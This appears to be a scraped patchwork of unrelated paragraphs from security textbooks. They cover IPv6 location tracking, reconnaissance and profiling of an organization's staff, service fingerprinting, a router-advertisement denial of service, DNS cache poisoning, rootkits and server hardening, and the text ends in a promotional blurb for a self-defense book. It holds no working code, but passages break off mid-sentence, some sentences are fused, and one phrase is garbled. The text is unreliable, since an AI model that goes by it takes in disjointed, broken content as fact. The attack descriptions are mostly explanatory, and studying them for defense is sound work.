Now assume an attacker to be located close to this mail server. Even when the mail traffic is encrypted, it is possible for the attacker to analyze traffic by interface IDs. If the attacker figures out the interface ID of the road warrior, then he can always discover the location of the road warrior by simply looking up the last packet with the matching interface ID the subnet prefix tells down to the subnet where the road warrior has been last seen, network-wise.
Application vulnerabilities are not less frequent or less critical than operating system vulnerabilities, but they generally have a greater risk as they directly manipulate user data and provide the services that the user is expecting from her computing platform. These attacks are also of greater interest to attackers, as they give direct access to the user and the user's data. Moreover, application attacks can take a very different shape from the ones performed at lower levels of the computing architecture, exploiting social engineering techniques to fool the user into believing false information (e.g., phishing) or performing actions on behalf of the attacker.
Note that insmod will normally refuse to load any modules that are not owned by the root account this behavior is an attempt at a defense against an attacker who obtains write access to a module directory. You can override this check with an option to insmod (or a modules.conf line), but doing so reduces the security of your system.
Quite frequently, employees within organizations leak pieces of seemingly innocent information to the Internet and sometimes for quite valid reasons. When each of these pieces of the puzzle is put together, however, a clearer picture forms than you would like of the organization's internal workings. Attackers who know where to find these pieces of information may be able to generate a more directed attack against your organization, and each piece of information gleaned makes the attack just that much more effective. So what type of information is an attacker searching for Anything and everything that will help put the pieces of your organization's puzzle together, including enumerating information relating to your organization, personnel, and systems.
This allows an attacker to gain an understanding of the target organization, including possibly high-level weaknesses providing the attacker with a strong knowledge-base from which to launch an attack. These weaknesses may be due to the ability to exploit trust relationships between various external parties, or where policies and processes are leaked to the public allowing an attacker to determine how to interact with the organization and the jargon required to do so. Apart from gathering this information via Internet search engines, corporate information websites such as http www.corporateinformation.com, http biz.yahoo.com, and http www.hoovers.com provide the public with detailed company information such as business summaries, financial blogs, analyst estimates and stock market statistics, insider information, executives' names and pay details, news headlines, and reports. Websites such as http www.internalmemos.com allow attackers to search for internal memos, leaked emails, and...
This type of information is generally seen by employees as insignificant and is, therefore, leaked out onto the Internet with little or no thought or understanding of the impact that it may have on the organization's security, or on the employees themselves. By gathering personnel information, an attacker is able to passively develop a profile of various individuals and roles, allowing vulnerable employees to be enumerated and trusted users to be determined. One specific type of personnel that attackers attempt to profile is technical employees. Interactions with technical employees should be treated with caution as they are generally more security aware however, they are highly sought after by attackers due to the likelihood that they have elevated privileges on the internal systems. Less technical staff members, as well as new staff members, are also popular targets as they aren't as likely to understand the implications of breaching the IT security Some Internet search engines...
To extend or verify the information gleaned during the passive profiling stage, an attacker may then move on to performing active web application enumeration. This entails actually connecting to the organization's systems to gather information that is generally not available through Internet search engines. This allows an attacker to see exactly what attacks can be carried out against the organization's employees and systems.
If we just set the preferred and valid lifetimes to zero, then according to what we've seen so far all hosts will mark the prefix as invalid and not use it anymore even for existing connections. An attacker connected to the subnet could therefore run a very simple denial of service attack by just sending router advertisements for the prefixes with zero lifetimes.
If the attacker's aim is to be covert about the attack, then he or she may choose to put off any port scanning and start with actively enumerating information from the organization's web applications gathered during the passive profiling stage. If port scanning is not carried out with caution, Intrusion Detection Systems (IDSs) or Intrusion Prevention Systems (IPSs) may be triggered, alerting administrators to the attack assuming the IDSs and IPSs are configured correctly.
After the open web applications have been discovered, the attacker now needs to fingerprint these services to determine what web servers and web server modules are running on the systems. Fingerprinting can be performed in a variety of ways. Most port scanners can be configured to pull back banners or perform service and operating system predictions, giving the attacker an idea as to whether the open port is running a web application. Administrators may also configure their applications to run on nonstandard ports in an attempt to either hide them from attackers or to make them believe that another service is running behind the port. This is known as security through obscurity. Amap, which stands for Application Mapper, is designed to perform fast and reliable application protocol detection. This allows an attacker to perform a port scan to determine easily what services have been configured to run on each of the ports whether they are running on standard or nonstandard ports. This,...
Most organizations have at least one firewall at their network border however, they do not secure their systems well enough to withstand a direct attack, allowing attacks that originate from the internal network to exploit vulnerable services that are not open to the Internet or allowing an attacker who has penetrated the border firewall to work his or her way easily through the internal network. system predictions, possibly allowing an attacker to exploit vulnerabilities in the OS. However, by restricting the protocols and ports that the server responds to, these operating system guesses are much less accurate, reducing attack precision significantly. IPTables can also be used to restrict access to more sensitive services, such as SSH or web management interfaces, so that only authorized IP addresses can connect to the ports. This isn't foolproof since an attacker may be able to spoof an IP address however, it definitely makes it less inviting.
Many web applications expose information that may seem trivial to a developer or administrator, but is often quite useful to an attacker. An example that you've already seen is the web server and module versions being disclosed through the HTTP headers. This may initially seem trivial, but to an attacker this may provide enough information to compromise your web server. Sensitive information leakage, therefore, needs to be minimized to ensure the security of the web service and application.
Asymmetric key cryptography makes it possible to share a public key without risk of compromising secure communication. However, an attack known as the man-in-the-middle attack exposes another problem key-validity. In this attack, the attacker intercepts the first message and sends its own public key to each. By doing this, each person thinks that the attacker is the other person. The end result is a stream of decrypted traffic that the attacker can read, modify, and use.
Wireless networking under the 802.11 standards is not built with security in mind. The practice of wardriving, where folks drive around with wireless-equipped laptops looking for a hotspot, tells you most of what you need to know about the security of the average wireless network. It's one thing to use random wireless hotspots to surf the web on the road, it's quite another to intercept packets of data transferring across someone's wireless network. This is potentially a serious problem that you need to be concerned about. Great progress has been made in the last few years, but this problem has not been solved yet. If an attacker is in your neighborhood and knows the frequency that your network uses, you have a nightmare on your hands. It should also be noted that the encryption standard of most wireless NICs is weaker than you need and should not be considered part of your security plan.
Regardless of how an anomaly is investigated, the intrusion analyst must take care when performing the investigation. If the attacker notices that there's an investigator currently looking around on the same system, it's much more likely that the attacker will slash and burn their way out of the system. If the attacker thinks he or she is being followed or monitored, the attacker might begin deleting anything and everything in the way, causing real damage to the systems in question. An attack that might have resulted in only a defacement of a website might suddenly turn into deletion of entire partitions if the attacker notices the investigation. If an attack has occurred or is currently underway, one of the first priorities is usually to stop the attack and prevent further damage from occurring. Keeping in mind that an attacker who notices an investigator on the same system is more likely to cause collateral damage, unplugging the system from the network is a common recommendation....
This is one of those messages that it's difficult to emphasize too much Secure passwords and secure machines are the first line of defense against electronic break-ins. Follow the password rules outlined in Chapter 19, especially if you're the Root user. Having access to the Root account is the holy grail for an attacker. Protect that account and that password with everything you have. Enforce the password standards mercilessly on your users as well.
In February 2005, it was discovered that the default configuration of Windows NT 4 and 2000 DNS servers and some Symantec Gateway products left them open to a DNS cache-poisoning attack.4 This vulnerability was exploited on the Internet by an attack in which a set of rogue DNS servers was used to advertise false DNS records to vulnerable downstream DNS servers so that legitimate user requests for some domains could be directed to IP addresses of the attacker's choosing. To make an arbitrary DNS server downstream from one of the rogue DNS servers, the attacker just needed to get the targeted server to issue a DNS request to the rogue server. This could be accomplished in a variety of ways, such as sending an email to a bogus user, thus eliciting a non-delivery report (NDR) to the source domain this requires a mail server to be running on the targeted network, or by issuing a request to the malicious server from a previously installed piece of spyware. 4 See for a comprehensive write-up...
Then sends packets that appear to come from the trusted host. The attacker can only send packets, but cannot see any responses. However, the attacker can predict the sequence of packets and essentially send commands that will set up a back door for future break-ins. A program that masquerades as a benign program but, in fact is a back door used for attacking a system. Attackers often install a collection of Trojan horse programs that enable the attacker to freely access the system with root privileges, yet hide that fact from the system administrator. Such collections of Trojan horse programs are called rootkits.
Open ports above port 1023 that come and go with successive scans are not generally cause for concern. Usually, these are associated with established connections and are not really open. However, they can also be an early indication of the presence of a Trojan horse installed by an attacker. It's good practice to scan your hosts after you configure them so that you can later distinguish normal from abnormal behavior.
With the exception of the string Setup.php, the above rule does not care about the specifics of the URI parameters requested from the webserver (which may vary depending on what the attacker is trying to accomplish). The signature is strictly looking for the string Setup.php in the URI portion of a web request, and this data must be seen in an established TCP connection, as required by the flow keyword. This makes simulating an exploit for the vulnerability quite easy
With more than 50 rootkits reported by Chkrootkit, you probably won't know the exact ramifications of being infected by a given rootkit. Further, there's a good chance that if one rootkit has been run, multiple rootkits have been run, making cleanup all that much more difficult. To begin the process of damage control, you can search the web for each individual rootkit to determine what actions it takes when it's run. However, realize that, by definition, after a rootkit has been run successfully, the attacker has root privileges on the computer and therefore may have done much greater damage to the system or may be in the process of doing so now
Input and output validation is still a major issue within web services, which opens up attacks such as cross-site scripting and injection attacks. Default errors and stack traces are still often left available via misconfigured web servers allowing an attacker to enumerate sensitive information. Similarly, default files and directories are often left available, possibly opening up other avenues for attacks. These need to be either removed or contained by tight ACLs. Do not neglect proper logging, monitoring, and alerting for nonstandard requests since web services are still a target for attacks. Set up SSL and TLS versions and ciphers securely to ensure that encrypted communications channels can't be manipulated. Web services can also implement additional security controls. Not embedding links to your private web service or WSDL file within your web applications is a step toward protecting the web service's visibility to the public. Preshared WSDL files among trusted partners is...
In this first dialog, make the existing configuration editable by selecting 'Start DHCP Server'. An important feature of the behavior of the DHCP server is its ability to run in a chroot environment, or chroot jail, to secure the server host. If the DHCP server should ever be compromised by an outside attack, the attacker will still be behind bars in the chroot jail, which prevents him from touching the rest of the system. The lower part of the dialog displays a tree view with the declarations that have already been defined. Modify these with 'Add', 'Delete', and 'Edit'. Selecting 'Advanced' takes you to additional expert dialogs. See Figure 21.41. After selecting 'Add', define the type of declaration to add. With 'Advanced', view the log file of the server, configure TSIG key management, and adjust the configuration of the firewall according to the setup of the DHCP server.
Get All The Support And Guidance You Need To Make Sure You Are Safe In This Crazy World! This Book Is One Of The Most Valuable Resources In The World When It Comes To The Art Of Self Defense The Easy Way! Try not to get ensnared in your own little bubble and be cognizant that there are people outside of your domain. Whether we like it or not there are individuals out there whose aims are not always advantageous.